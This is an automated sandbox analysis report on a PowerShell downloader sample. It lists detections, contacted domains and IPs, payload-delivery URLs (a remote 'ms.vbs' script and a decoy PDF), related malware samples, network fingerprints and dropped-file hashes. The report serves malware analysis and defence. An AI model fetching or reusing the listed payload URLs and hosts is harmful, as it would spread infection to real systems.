      gCXzb0K8Ci.ps134%ReversingLabsScript-PowerShell.Downloader.Boxter
      gCXzb0K8Ci.ps1100%AviraTR/PShell.Dldr.VPA

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.astenterprises.com.pk/ms/List0%Avira URL Cloudsafe
      https://www.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.p0%Avira URL Cloudsafe
      http://www.bluhwamaxxlashwar.com/ms/ms.vbs0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        astenterprises.com.pk
        		107.161.23.150
        		truefalse
          		high
          www.bluemaxxlaser.com
          		203.175.174.69
          		truefalse
            		high
            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
            		217.20.58.99
            		truefalse
              		high
              x1.i.lencr.org
              		unknown
              		unknownfalse
                		high
                www.astenterprises.com.pk
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                    		high
                    https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2305313682.00000293901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2305313682.000002939006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
                          		high
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000000.00000002.2219015938.0000029381AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://go.micropowershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A89D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A96FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A8B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.microsoft.copowershell.exe, 00000000.00000002.2319223440.00000293F7970000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.ppowershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/Iconpowershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.2082588505.000001A0A96FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.ver)svchost.exe, 00000007.00000002.3274345952.0000028B56800000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.2170632442.0000028B565C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                                		high
                                                http://go.microspowershell.exe, 00000003.00000002.2082588505.000001A0A8B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.2219015938.0000029381AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.bluhwamaxxlashwar.com/ms/ms.vbspowershell.exe, 00000000.00000002.2219015938.0000029380232000.00000004.00000800.00020000.00000000.sdmp, gCXzb0K8Ci.ps1true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://g.live.com/odclientsettings/Prod/C:edb.log.7.drfalse
                                                        		high
                                                        http://astenterprises.com.pkpowershell.exe, 00000000.00000002.2219015938.0000029381AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.2219015938.0000029381AE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.2219015938.0000029381B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2219015938.0000029381B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2305313682.00000293901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2305313682.000002939006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.2219015938.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A80D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2219015938.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A80D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        203.175.174.69
                                                                        		www.bluemaxxlaser.comSingapore
                                                                        		24482SGGS-AS-APSGGSSGfalse
                                                                        107.161.23.150
                                                                        		astenterprises.com.pkUnited States
                                                                        		3842RAMNODEUSfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1578233
                                                                        Start date and time:2024-12-19 12:50:19 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 5m 32s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:13
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:gCXzb0K8Ci.ps1
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:d4e49fb44f2d9c6b2626e82bfbded73e771f55e506618c5a2b47afbcf218bc24.ps1
                                                                        Detection:MAL
                                                                        Classification:mal84.evad.winPS1@20/59@5/3
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 83%
                                                                        • Number of executed functions: 5
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .ps1

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.137, 18.213.11.84, 50.16.47.176, 54.224.241.105, 34.237.241.83, 162.159.61.3, 172.64.41.3, 217.20.58.99, 92.122.16.236, 23.195.61.56, 23.32.239.56, 2.19.198.27, 23.32.239.9, 13.107.246.63, 20.12.23.50, 3.219.243.226, 23.41.168.139
                                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 2696 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6392 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: gCXzb0K8Ci.ps1

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        06:51:10API Interceptor68x Sleep call for process: powershell.exe modified
                                                                        06:51:22API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        06:51:32API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        203.175.174.69KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                        ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                        FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                        • www.bluemaxxlaser.com/ms/ms.vbs
                                                                        107.161.23.150H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                          KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                              8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                  2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                    tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                        yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                          0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            www.bluemaxxlaser.comKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            bg.microsoft.map.fastly.netKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                            • 199.232.214.172
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                            • 199.232.210.172
                                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172
                                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.214.172
                                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 199.232.210.172

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            RAMNODEUSH6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                            • 107.161.23.150
                                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            SGGS-AS-APSGGSSGH6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69
                                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 203.175.174.69

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eH6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                            • 107.161.23.150
                                                                                            8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 107.161.23.150
                                                                                            1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                            • 107.161.23.150
                                                                                            v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                            • 107.161.23.150

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.8307403275569238
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugL:gJjJGtpTq2yv1AuNZRY3diu8iBVqFt
                                                                                            MD5:12220A90B1668017DF626AD8A566E81B
                                                                                            SHA1:527AE50860A2667043145C1C66270687A22B980D
                                                                                            SHA-256:70F3C82B4F8CBBE0E7A3412107CCD77C60D77DD7898B71D0774E105D66B3E7CF
                                                                                            SHA-512:0ACA2DF867191C615EBC4BB15FD8B4341B9391E9B2685E649405C3CD64C261B9DCF216F96B7E533FDCD727570E8828A438D0821E5F79984370E64A74F1F183AD
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa182251f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.6586088490993207
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:ozuSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/T:ozuaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                            MD5:897F305A7B33F41393D1141861A4ACFA
                                                                                            SHA1:FD9D25BB497EA0E6FDDEEE9CEA370F70A4BA42C5
                                                                                            SHA-256:92C1B92E5894DB0E3ACAB0EBE3216191D631591FE0A9B024935C52C6BE90A799
                                                                                            SHA-512:4CA08FAE721ABE53A9F3A9D6B9CA3EEA0E0C12C1E8804D34531C6EE5E498D47E693D4118BF2BF4CAF7FACB52D380434445E18F6B18F39CFC3D05D0A57CFF14D4
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:..%.... ...............X\...;...{......................0.z..........{...3...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................B..:.3...|.................:...3...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.08099174296970536
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:8//EYeElGkGuAJkhvekl1K58allrekGltll/SPj:8XEz2rxlG5Je3l
                                                                                            MD5:03BF00F00FBCB85AF8964EFF9B46D22F
                                                                                            SHA1:FC036E22E973B8D23EA755B6AA92518E266FBD6B
                                                                                            SHA-256:6BE52763C6F41F4948602619D494DE29A96A901D1BB5DF587940DA0EA1DB400A
                                                                                            SHA-512:4FAA0F90D615696031D3BA2D8E13E212DB7BD7824333CD2280C1E2543023CB6A2A75850E0F4857B03A7C895ADFFF68A13018B163E07CE70FBAA18300D7DF244B
                                                                                            Malicious:false
                                                                                            Preview:.........................................;...{...3...|.......{...............{.......{...XL......{..................:...3...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.2201646703014015
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXAFE+q2P92nKuAl9OmbnIFUt8OhXMFJXWZmw+OhXMFJiVkwO92nKuAl9OmbjLJ:7hV+v4HAahFUt8Oh+m/+Oh+iV5LHAaSJ
                                                                                            MD5:67C100CD83B9BFF2AEA989B2BF75CA24
                                                                                            SHA1:7314B1F9CCD94C583EBE115C44C44FFE729E4FBD
                                                                                            SHA-256:B02BB001479523B4F107028DFFCBFFDF15D09E3D5042C51E1A575BEECEFAF939
                                                                                            SHA-512:CF2FFF1CA424B116408BEB6D973E3C49391A73D49D39C883DDC1B7773FEF8636EEDF4B16391F82E43F7620911114C3BD9699E398B0A83712BA07413609BFB157
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.485 f0c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:51:22.489 f0c Recovering log #3.2024/12/19-06:51:22.489 f0c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.2201646703014015
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXAFE+q2P92nKuAl9OmbnIFUt8OhXMFJXWZmw+OhXMFJiVkwO92nKuAl9OmbjLJ:7hV+v4HAahFUt8Oh+m/+Oh+iV5LHAaSJ
                                                                                            MD5:67C100CD83B9BFF2AEA989B2BF75CA24
                                                                                            SHA1:7314B1F9CCD94C583EBE115C44C44FFE729E4FBD
                                                                                            SHA-256:B02BB001479523B4F107028DFFCBFFDF15D09E3D5042C51E1A575BEECEFAF939
                                                                                            SHA-512:CF2FFF1CA424B116408BEB6D973E3C49391A73D49D39C883DDC1B7773FEF8636EEDF4B16391F82E43F7620911114C3BD9699E398B0A83712BA07413609BFB157
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.485 f0c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:51:22.489 f0c Recovering log #3.2024/12/19-06:51:22.489 f0c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):338
                                                                                            Entropy (8bit):5.201885304424498
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXuaSN+q2P92nKuAl9Ombzo2jMGIFUt8OhX1yWZmw+OhX1RVkwO92nKuAl9OmbX:7heaSN+v4HAa8uFUt8OhgW/+OhXV5LHA
                                                                                            MD5:591853A874595A7787D4124396DF1DF6
                                                                                            SHA1:1AA3F1BBFB0CA113C7D3784B1B36D940A870D264
                                                                                            SHA-256:413C949A2F448A269FE2F1BF30B8BA74F4C212B6F3A68D36CD704E311548902F
                                                                                            SHA-512:6F6C7205E9A6C50E10AEEE0567DE94296343B5DFA2599C3F8D3D1BAA212240EA556A6F6C675075C64A1DB82497AEC1075695463C2D23FA9B8883200C011BE6AC
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.569 163c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:51:22.571 163c Recovering log #3.2024/12/19-06:51:22.571 163c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):338
                                                                                            Entropy (8bit):5.201885304424498
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXuaSN+q2P92nKuAl9Ombzo2jMGIFUt8OhX1yWZmw+OhX1RVkwO92nKuAl9OmbX:7heaSN+v4HAa8uFUt8OhgW/+OhXV5LHA
                                                                                            MD5:591853A874595A7787D4124396DF1DF6
                                                                                            SHA1:1AA3F1BBFB0CA113C7D3784B1B36D940A870D264
                                                                                            SHA-256:413C949A2F448A269FE2F1BF30B8BA74F4C212B6F3A68D36CD704E311548902F
                                                                                            SHA-512:6F6C7205E9A6C50E10AEEE0567DE94296343B5DFA2599C3F8D3D1BAA212240EA556A6F6C675075C64A1DB82497AEC1075695463C2D23FA9B8883200C011BE6AC
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.569 163c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:51:22.571 163c Recovering log #3.2024/12/19-06:51:22.571 163c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0ce2b88e-5b04-4678-9d72-38621f46e8fd.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:modified
